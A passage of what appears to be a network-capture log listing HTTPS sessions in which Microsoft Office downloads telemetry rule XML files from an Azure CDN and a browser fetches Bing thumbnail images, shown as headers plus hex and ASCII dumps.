T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	49743	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:46 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:46 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085346Z-178bfbc474bxkclvhC1NYC69g4000000014g0000000091y9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:46 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:46 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:46 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085346Z-178bfbc474brk967hC1NYCfu6000000000x000000000g95c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:46 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.6	49741	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:46 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:46 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085346Z-1777c6cb7542p5p4hC1TEBq0980000000ay00000000024tp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:53:46 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.6	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:45 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:46 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:46 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 3af01634-701e-000d-3dd2-3b6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085346Z-r1d97b99577tssmjhC1TEB8kan0000000a2g0000000040x5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:53:46 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49755	2.23.209.187	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:47 UTC	367	OUT	GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive
2024-11-21 08:53:48 UTC	628	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Type: image/png Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Content-Length: 1107 Date: Thu, 21 Nov 2024 08:53:48 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.1ad01702.1732179228.11423321
2024-11-21 08:53:48 UTC	1107	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 03 e8 49 44 41 54 48 4b bd 56 df 6f 54 45 14 9e 7b 79 37 a2 bc 17 2a 7f 82 fa 2c 94 d7 96 1f 09 0f e2 0b d1 44 30 1a c5 42 4b 20 d0 90 00 89 89 3f 23 0b a1 a5 2d 82 b4 90 b4 1a 69 81 6e 63 49 20 41 5e 08 a5 85 85 6e 03 16 24 d8 b4 5d 76 bb eb da 36 e9 9c 73 c6 ef cc bd bb 4b c0 1a 5b 13 6f 72 ee f7 ed cc dd f3 cd f9 e6 cc cd 35 22 c2 ac b7 28 4a 5c f1 6f 79 fc a8 5e ff c4 fd c5 b8 0c 3b e7 e6 af f6 f0 ec b1 bd 3c d7 76 88 e6 da 0e 02 0f 2a 56 78 fb 21 9a 39 b6 87 e5 ee 10 0f 67 7e a4 9e d4 47 9c 1c dd 4d Data Ascii: PNGIHDRw=sRGBgAMAapHYs%%IR$IDATHKVoTE{y7,D0BK ?#-incI A^n$]v6sK[or5"(J\oy^;<vVx!9g~GM

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.6	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:47 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:48 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:48 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085348Z-178bfbc474bp8mkvhC1NYCzqnn0000000120000000008v64 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:48 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.6	49752	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:47 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:48 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:48 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085348Z-178bfbc474bgvl54hC1NYCsfuw000000014g00000000cruh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:48 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	49751	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:47 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:48 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:48 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085348Z-1777c6cb7542p5p4hC1TEBq0980000000ax0000000004ey6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:48 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:48 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:48 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085348Z-r1d97b99577n5jhbhC1TEB74vn0000000a30000000007pqm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:48 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	49754	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:48 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:48 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085348Z-178bfbc474bh5zbqhC1NYCkdug0000000150000000007hh3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:53:48 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49759	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	375	OUT	GET /th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-21 08:53:48 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 835660 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 2EAF6D7DF64A4609943BFDD1CB991F79 Ref B: EWR30EDGE1105 Ref C: 2024-11-21T08:53:48Z Date: Thu, 21 Nov 2024 08:53:48 GMT Connection: close
2024-11-21 08:53:48 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1c 64 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 32 33 3a 34 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``dExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:23:408
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: fd f2 c9 27 cd ff 00 2c 69 d1 c7 3f 97 b9 53 e5 6f e3 aa 52 95 f7 38 6b 6a b5 64 72 47 e5 41 e5 af fa b6 fe 0a a2 b0 2a 49 be 34 dd b6 ad dd 45 2b c8 9f bc 8d da ab 63 3b be 7d ad 5b 43 53 86 a4 ba 14 e6 6d af ba 3f bd 51 b1 95 a4 ab d3 27 97 fd da af 70 aa 7e 65 ad 14 50 e1 3b 91 ac bf dd 4a 31 24 8f fe f5 3d 91 47 dd 7f 9a a5 b7 45 f3 37 48 ff 00 2d 1a 0d c9 21 ab 6c d6 bf bd 3f 35 41 71 27 99 f7 aa cd d6 d2 fb 43 ff 00 c0 aa ab 06 67 da b5 36 08 5d ea f7 22 64 6a 23 4c 7d ea b3 e5 7c 9c 54 a6 2d bf 7a 8d 8a 75 0a 6a 1b 75 5c b7 2c 29 70 b5 23 47 f2 ee a6 8c a5 52 e5 ab 39 3c df f7 aa d4 47 1f 76 b3 6d 65 f2 fe 5a d0 b7 7d d4 8e 2a b1 b3 f2 2d c6 8c d4 93 44 bf c5 4f 8d d7 7e d5 ff 00 81 54 db 73 d6 8d ce 27 26 99 4d 76 fd c5 4a 9e 35 53 f2 d0 d1 fc f4 Data Ascii: 